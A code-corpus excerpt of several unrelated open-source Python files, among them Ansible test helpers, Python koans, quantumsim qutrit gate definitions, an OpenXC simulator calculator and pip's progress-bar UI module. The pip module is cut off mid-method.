# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Attribute map keyed by collection name. Each attribute declares whether it
# may be set on create (allow_post) or update (allow_put) and whether it is
# returned in API responses (is_visible).
EXTENDED_ATTRIBUTES_2_0 = {
    'networks': {
        'v2attrs:something': {'allow_post': False,
                              'allow_put': False,
                              'is_visible': True},
        # Accepted on create, never updatable, and hidden from responses.
        'v2attrs:something_else': {'allow_post': True,
                                   'allow_put': False,
                                   'is_visible': False},
    }
}
class V2attributes(object):
    """Example extension that adds extra attributes to v2 core resources."""

    def get_name(self):
        return "V2 Extended Attributes Example"

    def get_alias(self):
        return "v2attrs"

    def get_description(self):
        return "Demonstrates extended attributes on V2 core resources"

    def get_namespace(self):
        return "http://docs.openstack.org/ext/examples/v2attributes/api/v1.0"

    def get_updated(self):
        return "2012-07-18T10:00:00-00:00"

    def get_extended_resources(self, version):
        # Only API version 2.0 exposes the extra attributes.
        return EXTENDED_ATTRIBUTES_2_0 if version == "2.0" else {}
| apache-2.0 |
chrismeyersfsu/ansible | test/units/mock/procenv.py | 24 | 2516 | # (c) 2016, Matt Davis <mdavis@ansible.com>
# (c) 2016, Toshio Kuratomi <tkuratomi@ansible.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
# Make coding more python3-ish
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
import sys
import json
from contextlib import contextmanager
from io import BytesIO, StringIO
from ansible.compat.six import PY3
from ansible.compat.tests import unittest
from ansible.module_utils._text import to_bytes
@contextmanager
def swap_stdin_and_argv(stdin_data='', argv_data=tuple()):
    """
    context manager that temporarily masks the test runner's values for stdin and argv

    :param stdin_data: text to expose on the fake stdin
    :param argv_data: sequence to install as sys.argv
    """
    real_stdin = sys.stdin
    real_argv = sys.argv
    if PY3:
        sys.stdin = StringIO(stdin_data)
        # Modules reading raw bytes go through stdin.buffer.
        sys.stdin.buffer = BytesIO(to_bytes(stdin_data))
    else:
        sys.stdin = BytesIO(to_bytes(stdin_data))
    sys.argv = argv_data
    try:
        yield
    finally:
        # Restore even when the managed block raises; otherwise a failing
        # test would leak the fake stdin/argv into every subsequent test.
        sys.stdin = real_stdin
        sys.argv = real_argv
@contextmanager
def swap_stdout():
    """
    context manager that temporarily replaces stdout for tests that need to verify output

    Yields the in-memory stream installed as sys.stdout.
    """
    old_stdout = sys.stdout
    if PY3:
        fake_stream = StringIO()
    else:
        fake_stream = BytesIO()
    sys.stdout = fake_stream
    try:
        yield fake_stream
    finally:
        # Always restore the real stdout, even when the managed block raises.
        sys.stdout = old_stdout
class ModuleTestCase(unittest.TestCase):
    """Base TestCase that feeds AnsibleModule-style args via a fake stdin."""

    def setUp(self, module_args=None):
        # AnsibleModule reads its parameters as a JSON document on stdin,
        # wrapped in the ANSIBLE_MODULE_ARGS envelope.
        if module_args is None:
            module_args = {}

        args = json.dumps(dict(ANSIBLE_MODULE_ARGS=module_args))

        # unittest doesn't have a clean place to use a context manager, so we have to enter/exit manually
        self.stdin_swap = swap_stdin_and_argv(stdin_data=args)
        self.stdin_swap.__enter__()

    def tearDown(self):
        # unittest doesn't have a clean place to use a context manager, so we have to enter/exit manually
        self.stdin_swap.__exit__(None, None, None)
| gpl-3.0 |
HarisunnYT/GraphicsEngine | tinyobjloader-master/tests/config-posix.py | 5 | 1347 | exe = "tester"
# "gnu" or "clang"
toolchain = "gnu"
# optional
link_pool_depth = 1
# optional
builddir = {
"gnu" : "build"
, "msvc" : "build"
, "clang" : "build"
}
includes = {
"gnu" : [ "-I." ]
, "msvc" : [ "/I." ]
, "clang" : [ "-I." ]
}
defines = {
"gnu" : [ ]
, "msvc" : [ ]
, "clang" : [ ]
}
cflags = {
"gnu" : [ "-O2", "-g" ]
, "msvc" : [ "/O2" ]
, "clang" : [ "-O2", "-g" ]
}
# Warn as much as possible: http://qiita.com/MitsutakaTakeda/items/6b9966f890cc9b944d75
cxxflags = {
"gnu" : [ "-O2", "-g", "-pedantic -Wall -Wextra -Wcast-align -Wcast-qual -Wctor-dtor-privacy -Wdisabled-optimization -Wformat=2 -Winit-self -Wmissing-declarations -Wmissing-include-dirs -Wold-style-cast -Woverloaded-virtual -Wredundant-decls -Wshadow -Wsign-conversion -Wsign-promo -Wstrict-overflow=5 -Wswitch-default -Wundef -Werror -Wno-unused", "-fsanitize=address" ]
, "msvc" : [ "/O2", "/W4" ]
, "clang" : [ "-O2", "-g", "-Werror -Weverything -Wno-c++98-compat -Wno-c++98-compat-pedantic", "-fsanitize=address" ]
}
ldflags = {
"gnu" : [ "-fsanitize=address" ]
, "msvc" : [ ]
, "clang" : [ "-fsanitize=address" ]
}
cxx_files = [ "tester.cc" ]
c_files = [ ]
# You can register your own toolchain through register_toolchain function
def register_toolchain(ninja):
pass
| mit |
aishraj/pykons_solution | python3/koans/about_modules.py | 33 | 2373 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# This is very different to AboutModules in Ruby Koans
# Our AboutMultipleInheritance class is a little more comparable
#
from runner.koan import *
from .another_local_module import *
from .local_module_with_all_defined import *
class AboutModules(Koan):
    """Koan exercises about Python's import system.

    The ``__`` placeholders are intentional blanks for the student to fill
    in; they must remain unchanged.
    """
    def test_importing_other_python_scripts_as_modules(self):
        from . import local_module # local_module.py

        duck = local_module.Duck()
        self.assertEqual(__, duck.name)

    def test_importing_attributes_from_classes_using_from_keyword(self):
        from .local_module import Duck

        duck = Duck() # no module qualifier needed this time
        self.assertEqual(__, duck.name)

    def test_we_can_import_multiple_items_at_once(self):
        from . import jims, joes

        jims_dog = jims.Dog()
        joes_dog = joes.Dog()
        self.assertEqual(__, jims_dog.identify())
        self.assertEqual(__, joes_dog.identify())

    def test_importing_all_module_attributes_at_once(self):
        # NOTE Using this module level import declared at the top of this script:
        # from .another_local_module import *
        #
        # Import wildcard cannot be used from within classes or functions
        goose = Goose()
        hamster = Hamster()

        self.assertEqual(__, goose.name)
        self.assertEqual(__, hamster.name)

    def test_modules_hide_attributes_prefixed_by_underscores(self):
        with self.assertRaises(___): private_squirrel = _SecretSquirrel()

    def test_private_attributes_are_still_accessible_in_modules(self):
        from .local_module import Duck # local_module.py

        duck = Duck()
        self.assertEqual(__, duck._password)
        # module level attribute hiding doesn't affect class attributes
        # (unless the class itself is hidden).

    def test_a_module_can_choose_which_attributes_are_available_to_wildcards(self):
        # NOTE Using this module level import declared at the top of this script:
        # from .local_module_with_all_defined import *

        # 'Goat' is on the __ALL__ list
        goat = Goat()
        self.assertEqual(__, goat.name)

        # How about velociraptors?
        lizard = _Velociraptor()
        self.assertEqual(__, lizard.name)

        # SecretDuck? Never heard of her!
        with self.assertRaises(___): duck = SecretDuck()
| mit |
elliotf/heekscnc | pycnc/wxProgramDlg.py | 25 | 3443 | import wx
import HeeksCNC
from Program import Program
from wxHDialog import HDialog
from wxPictureWindow import PictureWindow
from wxNiceTextCtrl import LengthCtrl
from wxNiceTextCtrl import DoubleCtrl
from wxNiceTextCtrl import GeomCtrl
from consts import *
class ProgramDlg(HDialog):
    """Dialog for editing a CNC Program's machine, output file and units.

    While ignore_event_functions is True, event handlers are no-ops; this
    prevents feedback loops while the dialog programmatically sets control
    values.
    """
    def __init__(self, program):
        HDialog.__init__(self, "Program")
        self.program = program
        self.ignore_event_functions = True
        sizerMain = wx.BoxSizer(wx.VERTICAL)

        # add the controls in one column
        self.machines = program.GetMachines()
        choices = []
        for machine in self.machines:
            choices.append(machine.description)
        self.cmbMachine = wx.ComboBox(self, choices = choices)
        self.AddLabelAndControl(sizerMain, "machine", self.cmbMachine)

        self.chkOutputSame = wx.CheckBox( self, label = "output file name follows data file name" )
        sizerMain.Add( self.chkOutputSame, 0, wx.ALL, self.control_border )

        self.txtOutputFile = wx.TextCtrl(self)
        self.lblOutputFile, self.btnOutputFile = self.AddFileNameControl(sizerMain, "output file", self.txtOutputFile)

        self.cmbUnits = wx.ComboBox(self, choices = ["mm", "inch"])
        self.AddLabelAndControl(sizerMain, "units", self.cmbUnits)

        # to do "Raw Material" and "Brinell Hardness of raw material"

        # add OK and Cancel
        sizerOKCancel = self.MakeOkAndCancel(wx.HORIZONTAL)
        sizerMain.Add( sizerOKCancel, 0, wx.ALL + wx.ALIGN_RIGHT + wx.ALIGN_BOTTOM, self.control_border )

        # Populate controls from the program, then enable/disable accordingly.
        self.SetFromData()
        self.EnableControls()

        self.SetSizer( sizerMain )
        sizerMain.SetSizeHints(self)
        sizerMain.Fit(self)

        self.cmbMachine.SetFocus()
        self.ignore_event_functions = False

        self.Bind(wx.EVT_CHECKBOX, self.OnCheckOutputSame, self.chkOutputSame)

    def EnableControls(self):
        # Manual output-file controls only apply when the name does not
        # follow the data file name.
        output_same = self.chkOutputSame.GetValue()
        self.txtOutputFile.Enable(output_same == False)
        self.btnOutputFile.Enable(output_same == False)
        self.lblOutputFile.Enable(output_same == False)

    def OnCheckOutputSame(self, event):
        if self.ignore_event_functions: return
        self.EnableControls()

    def GetData(self):
        # Copy the dialog control values back into self.program.
        if self.ignore_event_functions: return
        self.ignore_event_functions = True

        if self.cmbMachine.GetSelection() != wx.NOT_FOUND:
            self.program.machine = self.machines[self.cmbMachine.GetSelection()]
        self.program.output_file_name_follows_data_file_name = self.chkOutputSame.GetValue()
        self.program.output_file = self.txtOutputFile.GetValue()
        # units is stored as a scale factor: 25.4 for inch, 1.0 for mm.
        if self.cmbUnits.GetValue() == "inch":
            self.program.units = 25.4
        else:
            self.program.units = 1.0

        self.ignore_event_functions = False

    def SetFromData(self):
        # Copy self.program's values into the dialog controls.
        self.ignore_event_functions = True
        self.cmbMachine.SetValue(self.program.machine.description)
        self.chkOutputSame.SetValue(self.program.output_file_name_follows_data_file_name)
        self.txtOutputFile.SetValue(self.program.output_file)
        if self.program.units == 25.4:
            self.cmbUnits.SetValue("inch")
        else:
            self.cmbUnits.SetValue("mm")
        self.ignore_event_functions = False
| bsd-3-clause |
brianzi/quantumsim | quantumsim/operations/qutrits.py | 1 | 9767 | import numpy as np
from scipy.linalg import expm
from .. import bases
from .operation import Operation
from ..algebra.tools import verify_kraus_unitarity
# Pauli basis vectors for the qubit (2-level) subspace, keyed by label.
_PAULI = dict(zip(['I', 'X', 'Y', 'Z'], bases.gell_mann(2).vectors))

# Default single- and two-qutrit bases used by all operations below.
bases1_default = (bases.general(3),)
bases2_default = bases1_default * 2
def rotate_euler(phi, theta, lamda):
    """A perfect single qubit rotation described by three Euler angles,

    .. math::

        U = R_Z(\\phi) \\cdot R_X(\\theta) \\cdot R_Z(\\lambda),

    acting on the qubit subspace of a qutrit (level 2 untouched).

    Parameters
    ----------
    phi, theta, lamda: float
        Euler rotation angles in radians.

    Returns
    -------
    Operation
        An operation, that corresponds to the rotation.
    """
    half_theta = theta / 2
    cos, sin = np.cos(half_theta), np.sin(half_theta)
    exp_phi = np.exp(1j * phi)
    exp_lambda = np.exp(1j * lamda)
    matrix = np.array([
        [cos, -1j * exp_lambda * sin, 0],
        [-1j * exp_phi * sin, exp_phi * exp_lambda * cos, 0],
        [0, 0, 1],
    ])
    return Operation.from_kraus(matrix, bases1_default)
def rotate_x(angle=np.pi):
    """A perfect single qubit rotation around :math:`Ox` axis
    (acting on the qubit subspace of a qutrit).

    Parameters
    ----------
    angle: float, optional
        Rotation angle in radians. Default is :math:`\\pi`.

    Returns
    -------
    Operation
        An operation, that corresponds to the rotation.
    """
    half = angle / 2
    cos, sin = np.cos(half), np.sin(half)
    matrix = np.array([
        [cos, -1j * sin, 0],
        [-1j * sin, cos, 0],
        [0, 0, 1],
    ])
    return Operation.from_kraus(matrix, bases1_default)
def rotate_y(angle=np.pi):
    """A perfect single qubit rotation around :math:`Oy` axis
    (acting on the qubit subspace of a qutrit).

    Parameters
    ----------
    angle: float, optional
        Rotation angle in radians. Default is :math:`\\pi`.

    Returns
    -------
    Operation
        An operation, that corresponds to the rotation.
    """
    half = angle / 2
    cos, sin = np.cos(half), np.sin(half)
    matrix = np.array([
        [cos, -sin, 0],
        [sin, cos, 0],
        [0, 0, 1],
    ])
    return Operation.from_kraus(matrix, bases1_default)
def rotate_z(angle=np.pi):
    """A perfect single qubit rotation around :math:`Oz` axis
    (acting on the qubit subspace of a qutrit).

    Parameters
    ----------
    angle: float, optional
        Rotation angle in radians. Default is :math:`\\pi`.

    Returns
    -------
    Operation
        An operation, that corresponds to the rotation.
    """
    half_phase = np.exp(-1j * angle / 2)
    matrix = np.diag([half_phase, half_phase.conjugate(), 1])
    return Operation.from_kraus(matrix, bases1_default)
def phase_shift(angle=np.pi):
    """Shift the phase of basis state :math:`|1\\rangle` by `angle`
    (identity on states 0 and 2).
    """
    phase = np.exp(1j * angle)
    return Operation.from_kraus(np.diag([1, phase, 1]), bases1_default)
def hadamard():
    """A perfect Hadamard operation on the qubit subspace of a qutrit.

    Returns
    -------
    Operation
        An operation, that corresponds to the rotation.
    """
    amp = np.sqrt(0.5)
    matrix = np.array([
        [amp, amp, 0],
        [amp, -amp, 0],
        [0, 0, 1],
    ])
    return Operation.from_kraus(matrix, bases1_default)
# Default parameter set for cphase(); any keyword passed to cphase() must be
# one of these keys, and missing keys fall back to these values.
default_cphase_params = dict(
    leakage_rate=0.,
    leakage_phase=-np.pi/2,
    leakage_mobility_rate=0.,
    leakage_mobility_phase=0.,
    phase_22=0.,
    # Decoherence times (only referenced by model implementations).
    q0_t1=np.inf,
    q0_t2=np.inf,
    q1_t1=np.inf,
    q1_t2=np.inf,
    q1_t2_int=None,
    q0_anharmonicity=0.,
    q1_anharmonicity=0.,
    # Pulse timing (same units as the time parameters above).
    rise_time=2,
    int_time=28,
    phase_corr_time=12,
    phase_corr_error=0.,
    # Flux-noise model inputs.
    quasistatic_flux=0.,
    sensitivity=0.,
    phase_diff_02_12=np.pi,
    phase_diff_20_21=0.,
)
def cphase(angle=np.pi, *, model='legacy', **kwargs):
    """

    Parameters
    ----------
    angle : float
        Conditional phase of a CPhase gate, default is :math:`\\pi`.
    model : str
        Error model (currently only 'legacy' and 'NetZero' is implemented).
    **kwargs
        Parameters for the error model. Must be keys of
        ``default_cphase_params``; unknown names raise ValueError.

    Returns
    -------
    Operation
        Resulting CPhase operation. First qubit is static (low-frequency)
        qubit,

    Raises
    ------
    ValueError
        On an unknown model name or model parameter.
    RuntimeError
        If the constructed NetZero unitary fails the unitarity check.
    """
    # Parameter lookup with fall-through to the module-level defaults.
    def p(name):
        return kwargs.get(name, default_cphase_params[name])

    # Reject typos early instead of silently using a default.
    for param in kwargs.keys():
        if param not in default_cphase_params.keys():
            raise ValueError('Unknown model parameter: {}'.format(param))

    int_time = p('int_time')
    leakage_rate = p('leakage_rate')
    # Phase deviation induced by quasistatic flux noise over the interaction.
    qstatic_deviation = int_time * np.pi * \
        p('sensitivity') * (p('quasistatic_flux') ** 2)
    # Extra leakage from interference under the quasistatic deviation.
    qstatic_interf_leakage = (0.5 - (2 * leakage_rate)) * \
        (1 - np.cos(1.5 * qstatic_deviation))
    phase_corr_error = p('phase_corr_error')
    rot_angle = angle + (1.5 * qstatic_deviation) + (2 * phase_corr_error)
    if model.lower() == 'legacy':
        cz_op = _cphase_legacy(angle, leakage_rate)
    elif model.lower() == 'netzero':
        # Ideal diagonal-phase part of the gate.
        ideal_unitary = expm(1j * _ideal_generator(
            phase_10=phase_corr_error,
            phase_01=phase_corr_error + qstatic_deviation,
            phase_11=rot_angle,
            phase_02=rot_angle,
            phase_12=p('phase_diff_02_12') - rot_angle,
            phase_20=0,
            phase_21=p('phase_diff_20_21'),
            phase_22=p('phase_22')
        ))
        # Coherent leakage/exchange part of the gate.
        noisy_unitary = expm(1j * _exchange_generator(
            leakage=4 * leakage_rate + qstatic_interf_leakage,
            leakage_phase=p('leakage_phase'),
            leakage_mobility_rate=p('leakage_mobility_rate'),
            leakage_mobility_phase=p('leakage_mobility_phase'),
        ))
        cz_unitary = ideal_unitary @ noisy_unitary

        if not verify_kraus_unitarity(cz_unitary):
            raise RuntimeError("CPhase gate is not unitary, "
                               "verify provided parameters.")

        cz_op = Operation.from_kraus(cz_unitary, bases2_default)
    else:
        raise ValueError('Unknown CZ model: {}'.format(model))
    return cz_op
def _cphase_legacy(angle=np.pi, leakage=0.):
    """A perfect controlled phase rotation.
    First qubit is low-frequency, second qubit is high-frequency (it leaks).

    Parameters
    ----------
    angle: float, optional
        Rotation angle in radians. Default is :math:`\\pi`.
    leakage: float, optional
        Leakage rate of a CPhase gate

    Returns
    -------
    Operation
        An operation, that corresponds to the rotation.
    """
    # Generator couples the |02> and |11> levels (indices 2 and 4).
    generator = np.zeros((9, 9))
    generator[2, 4] = generator[4, 2] = 1
    # Reduce the rotation fraction to produce the requested leakage.
    angle_frac = 1 - np.arcsin(np.sqrt(leakage)) / np.pi
    unitary = expm(-1j * angle * angle_frac * generator)
    return Operation.from_kraus(unitary, bases2_default)
def _ideal_generator(phase_01,
phase_02,
phase_10,
phase_11,
phase_12,
phase_20,
phase_21,
phase_22):
phases = np.array([0, phase_01, phase_02, phase_10,
phase_11, phase_12, phase_20, phase_21, phase_22])
generator = np.diag(phases).astype(complex)
return generator
def _exchange_generator(leakage, leakage_phase,
leakage_mobility_rate, leakage_mobility_phase):
generator = np.zeros((9, 9), dtype=complex)
generator[2][4] = 1j * \
np.arcsin(np.sqrt(leakage)) * np.exp(1j * leakage_phase)
generator[4][2] = -1j * \
np.arcsin(np.sqrt(leakage)) * np.exp(-1j * leakage_phase)
generator[5][7] = 1j * np.arcsin(np.sqrt(leakage_mobility_rate)) * \
np.exp(1j * leakage_mobility_phase)
generator[7][5] = -1j * \
np.arcsin(np.sqrt(leakage_mobility_rate)) * \
np.exp(-1j * leakage_mobility_phase)
return generator
def cnot():
    """A perfect CNOT on the qubit subspace of two qutrits."""
    # Generator acts on the |10>/|11> levels (indices 3 and 4).
    generator = np.zeros((9, 9))
    generator[3:5, 3:5] = [[0.5, -0.5],
                           [-0.5, 0.5]]
    unitary = expm(-1j * np.pi * generator)
    return Operation.from_kraus(unitary, bases2_default)
def amp_damping(p0_up, p1_up, p1_down, p2_down):
    """
    A gate, that excites or relaxes a qutrit with a certain probability.

    Parameters
    ----------
    p0_up : float
        Probability to excite to state 1, being in the state 0
    p1_up : float
        Probability to excite to state 2, being in the state 1
    p1_down : float
        Probability to relax to state 0, being in the state 1
    p2_down : float
        Probability to relax to state 1, being in the state 2

    Returns
    -------
    quantumsim.operation._PTMOperation
    """
    # Population-transfer matrix over the diagonal (computational) part
    # of the PTM; all coherences are left untouched (identity).
    transfer = np.array([
        [1. - p0_up, p1_down, 0.],
        [p0_up, 1. - p1_down - p1_up, p2_down],
        [0., p1_up, 1 - p2_down]])
    ptm = np.identity(9, dtype=float)
    ptm[:3, :3] = transfer
    basis = (bases.general(3),)
    return Operation.from_ptm(ptm, basis, basis)
def meas_butterfly(p0_up, p1_up, p1_down, p2_down):
    """
    Returns a gate, that corresponds to measurement-induced excitations.

    Each measurement should be sandwiched by two of these gates (before
    and after projection), so each application carries half of the total
    transition probability. Restricting to the computational subbasis
    dephases the qubit immediately.

    Note: if measurement-induced leakage is reported by RB, p1_up should
    be twice larger, since RB would report average probability for both 0
    and 1 state.

    Parameters
    ----------
    p0_up : float
        Probability to excite to state 1, being in the state 0
    p1_up : float
        Probability to excite to state 2, being in the state 1
    p1_down : float
        Probability to relax to state 0, being in the state 1
    p2_down : float
        Probability to relax to state 1, being in the state 2

    Returns
    -------
    quantumsim.operation._PTMOperation
    """
    half_damping = amp_damping(0.5 * p0_up, 0.5 * p1_up,
                               0.5 * p1_down, 0.5 * p2_down)
    basis = (bases.general(3).computational_subbasis(),)
    return half_damping.set_bases(bases_in=basis, bases_out=basis)
| gpl-3.0 |
apiri/openxc-vehicle-simulator | data/lat_calc.py | 1 | 1310 | from .data_calc import DataCalc
from datetime import datetime
import math
class LatCalc(DataCalc):
    """Dead-reckons a latitude value from vehicle speed and heading."""

    def __init__(self):
        self.initialize_data()

    def initialize_data(self):
        # Starting latitude in degrees.
        self.data = 42.095425
        self.last_calc = datetime.now()
        self.earth_circumference_km = 40075.0
        self.km_per_deg = self.earth_circumference_km / 360.0
        self.name = 'latitude'

    # Any necessary data should be passed in
    def iterate(self, snapshot):
        vehicle_speed = snapshot['vehicle_speed']
        heading = snapshot['heading']

        now = datetime.now()
        elapsed = now - self.last_calc
        self.last_calc = now
        time_step = elapsed.seconds + (
            float(elapsed.microseconds) / 1000000)

        # Speed is divided by 3600, so it is treated as km/h -> km/s.
        distance = time_step * (vehicle_speed / 3600)
        # heading goes straight into math.cos, so it is assumed to be in
        # radians — TODO confirm against the producer of 'heading'.
        north_south_dist = distance * math.cos(heading)

        self.data += north_south_dist / self.km_per_deg
        # TODO: check for the poles
| bsd-3-clause |
gitgitcode/myflask | venv/lib/python2.7/site-packages/pip/utils/ui.py | 490 | 11597 | from __future__ import absolute_import
from __future__ import division
import itertools
import sys
from signal import signal, SIGINT, default_int_handler
import time
import contextlib
import logging
from pip.compat import WINDOWS
from pip.utils import format_size
from pip.utils.logging import get_indentation
from pip._vendor import six
from pip._vendor.progress.bar import Bar, IncrementalBar
from pip._vendor.progress.helpers import (WritelnMixin,
HIDE_CURSOR, SHOW_CURSOR)
from pip._vendor.progress.spinner import Spinner
try:
from pip._vendor import colorama
# Lots of different errors can come from this, including SystemError and
# ImportError.
except Exception:
colorama = None
logger = logging.getLogger(__name__)
def _select_progress_class(preferred, fallback):
    """Return *preferred* if its output stream can encode the bar's glyphs,
    otherwise return *fallback* (the plain ASCII bar).
    """
    encoding = getattr(preferred.file, "encoding", None)

    # If we don't know what encoding this file is in, then we'll just assume
    # that it doesn't support unicode and use the ASCII bar.
    if not encoding:
        return fallback

    # Collect all of the possible characters we want to use with the preferred
    # bar.
    glyphs = [
        getattr(preferred, "empty_fill", six.text_type()),
        getattr(preferred, "fill", six.text_type()),
    ]
    glyphs.extend(getattr(preferred, "phases", []))

    # Try to encode those characters with the stream's encoding; if this works
    # we can use the fancier bar, otherwise fall back to plaintext.
    try:
        six.text_type().join(glyphs).encode(encoding)
    except UnicodeEncodeError:
        return fallback
    return preferred
# Fancy unicode bar when stdout can encode it, plain ASCII bar otherwise.
_BaseBar = _select_progress_class(IncrementalBar, Bar)
class InterruptibleMixin(object):
    """
    Helper to ensure that self.finish() gets called on keyboard interrupt.

    This allows downloads to be interrupted without leaving temporary state
    (like hidden cursors) behind.

    This class is similar to the progress library's existing SigIntMixin
    helper, but as of version 1.2, that helper has the following problems:

    1. It calls sys.exit().
    2. It discards the existing SIGINT handler completely.
    3. It leaves its own handler in place even after an uninterrupted finish,
       which will have unexpected delayed effects if the user triggers an
       unrelated keyboard interrupt some time after a progress-displaying
       download has already completed, for example.
    """

    def __init__(self, *args, **kwargs):
        """
        Save the original SIGINT handler for later.
        """
        super(InterruptibleMixin, self).__init__(*args, **kwargs)

        # Install our handler and keep the previous one to restore in finish().
        self.original_handler = signal(SIGINT, self.handle_sigint)

        # If signal() returns None, the previous handler was not installed from
        # Python, and we cannot restore it. This probably should not happen,
        # but if it does, we must restore something sensible instead, at least.
        # The least bad option should be Python's default SIGINT handler, which
        # just raises KeyboardInterrupt.
        if self.original_handler is None:
            self.original_handler = default_int_handler

    def finish(self):
        """
        Restore the original SIGINT handler after finishing.

        This should happen regardless of whether the progress display finishes
        normally, or gets interrupted.
        """
        super(InterruptibleMixin, self).finish()
        signal(SIGINT, self.original_handler)

    def handle_sigint(self, signum, frame):
        """
        Call self.finish() before delegating to the original SIGINT handler.

        This handler should only be in place while the progress display is
        active.
        """
        self.finish()
        self.original_handler(signum, frame)
class DownloadProgressMixin(object):
    """Adds download-oriented formatting helpers (byte counts, speed, ETA)
    on top of a progress bar/spinner class.
    """

    def __init__(self, *args, **kwargs):
        super(DownloadProgressMixin, self).__init__(*args, **kwargs)
        # Indent the message to line up with pip's log output.
        indent = " " * (get_indentation() + 2)
        self.message = indent + self.message

    @property
    def downloaded(self):
        """Human-readable amount downloaded so far."""
        return format_size(self.index)

    @property
    def download_speed(self):
        """Human-readable bytes/second, or '...' before any sample exists."""
        # Avoid zero division errors...
        if self.avg == 0.0:
            return "..."
        return format_size(1 / self.avg) + "/s"

    @property
    def pretty_eta(self):
        """Formatted ETA, or an empty string when no estimate is available."""
        if not self.eta:
            return ""
        return "eta %s" % self.eta_td

    def iter(self, it, n=1):
        """Iterate *it*, advancing the bar by *n* per item; finish at the end."""
        for item in it:
            yield item
            self.next(n)
        self.finish()
class WindowsMixin(object):
    """Mixin that adapts a progress class to the Windows console:
    disables cursor hiding and routes output through colorama when available.
    """

    def __init__(self, *args, **kwargs):
        # The Windows terminal does not support the hide/show cursor ANSI codes
        # even with colorama. So we'll ensure that hide_cursor is False on
        # Windows.
        # This call needs to go before the super() call, so that hide_cursor
        # is set in time. The base progress bar class writes the "hide cursor"
        # code to the terminal in its init, so if we don't set this soon
        # enough, we get a "hide" with no corresponding "show"...
        if WINDOWS and self.hide_cursor:
            self.hide_cursor = False

        super(WindowsMixin, self).__init__(*args, **kwargs)

        # Check if we are running on Windows and we have the colorama module,
        # if we do then wrap our file with it.
        if WINDOWS and colorama:
            self.file = colorama.AnsiToWin32(self.file)
            # The progress code expects to be able to call self.file.isatty()
            # but the colorama.AnsiToWin32() object doesn't have that, so we'll
            # add it.
            self.file.isatty = lambda: self.file.wrapped.isatty()
            # The progress code expects to be able to call self.file.flush()
            # but the colorama.AnsiToWin32() object doesn't have that, so we'll
            # add it.
            self.file.flush = lambda: self.file.wrapped.flush()
class DownloadProgressBar(WindowsMixin, InterruptibleMixin,
                          DownloadProgressMixin, _BaseBar):
    """Determinate progress bar: percent message plus a suffix showing
    downloaded size, speed and ETA (fields from DownloadProgressMixin)."""

    file = sys.stdout
    message = "%(percent)d%%"
    suffix = "%(downloaded)s %(download_speed)s %(pretty_eta)s"
class DownloadProgressSpinner(WindowsMixin, InterruptibleMixin,
                              DownloadProgressMixin, WritelnMixin, Spinner):
    """Indeterminate spinner variant: shows downloaded size and speed but
    no percentage/ETA (used when the total size is not known)."""

    file = sys.stdout
    suffix = "%(downloaded)s %(download_speed)s"

    def next_phase(self):
        # Lazily create the cycling iterator over the spinner glyphs
        # (self.phases comes from the Spinner base class).
        if not hasattr(self, "_phaser"):
            self._phaser = itertools.cycle(self.phases)
        return next(self._phaser)

    def update(self):
        # Interpolate the message/suffix templates against self (the
        # progress classes support %-formatting with their own fields).
        message = self.message % self
        phase = self.next_phase()
        suffix = self.suffix % self
        line = ''.join([
            message,
            " " if message else "",
            phase,
            " " if suffix else "",
            suffix,
        ])
        self.writeln(line)
################################################################
# Generic "something is happening" spinners
#
# We don't even try using progress.spinner.Spinner here because it's actually
# simpler to reimplement from scratch than to coerce their code into doing
# what we need.
################################################################
@contextlib.contextmanager
def hidden_cursor(file):
    """Context manager that hides the terminal cursor on *file* while the
    body runs, restoring it afterwards."""
    # The Windows terminal does not support the hide/show cursor ANSI
    # codes, even via colorama — don't even try there.
    if WINDOWS:
        yield
        return
    # Skip the control characters when not writing to a terminal, or when
    # the user is running with --quiet.
    # See https://github.com/pypa/pip/issues/3418
    if not file.isatty() or logger.getEffectiveLevel() > logging.INFO:
        yield
        return
    file.write(HIDE_CURSOR)
    try:
        yield
    finally:
        file.write(SHOW_CURSOR)
class RateLimiter(object):
    """Tracks whether enough wall-clock time has elapsed since the last
    recorded update to allow another one."""

    def __init__(self, min_update_interval_seconds):
        self._min_update_interval_seconds = min_update_interval_seconds
        self._last_update = 0

    def ready(self):
        """Return True when at least the minimum interval has passed."""
        elapsed = time.time() - self._last_update
        return elapsed >= self._min_update_interval_seconds

    def reset(self):
        """Record the current time as the moment of the last update."""
        self._last_update = time.time()
class InteractiveSpinner(object):
    """Spinner for interactive terminals: rewrites a single status cell in
    place, rate-limited so it does not flood the terminal."""

    def __init__(self, message, file=None, spin_chars="-\\|/",
                 # Empirically, 8 updates/second looks nice
                 min_update_interval_seconds=0.125):
        self._message = message
        self._file = sys.stdout if file is None else file
        self._rate_limiter = RateLimiter(min_update_interval_seconds)
        self._finished = False
        self._spin_cycle = itertools.cycle(spin_chars)
        self._file.write(" " * get_indentation() + self._message + " ... ")
        self._width = 0

    def _write(self, status):
        assert not self._finished
        # Backspace over the previous status, blank it with spaces, then
        # backspace again so the new status starts at the same column.
        erase = "\b" * self._width
        self._file.write(erase + " " * self._width + erase)
        self._file.write(status)
        self._width = len(status)
        self._file.flush()
        self._rate_limiter.reset()

    def spin(self):
        if self._finished or not self._rate_limiter.ready():
            return
        self._write(next(self._spin_cycle))

    def finish(self, final_status):
        if self._finished:
            return
        self._write(final_status)
        self._file.write("\n")
        self._file.flush()
        self._finished = True
# Used for dumb terminals, non-interactive installs (no tty), etc.
# We still print updates occasionally (once every 60 seconds by default) to
# act as a keep-alive for systems like Travis-CI that take lack-of-output as
# an indication that a task has frozen.
class NonInteractiveSpinner(object):
    """Spinner replacement that reports status through the logging system
    instead of animating the terminal."""

    def __init__(self, message, min_update_interval_seconds=60):
        self._message = message
        self._finished = False
        self._rate_limiter = RateLimiter(min_update_interval_seconds)
        self._update("started")

    def _update(self, status):
        assert not self._finished
        self._rate_limiter.reset()
        logger.info("%s: %s", self._message, status)

    def spin(self):
        if self._finished or not self._rate_limiter.ready():
            return
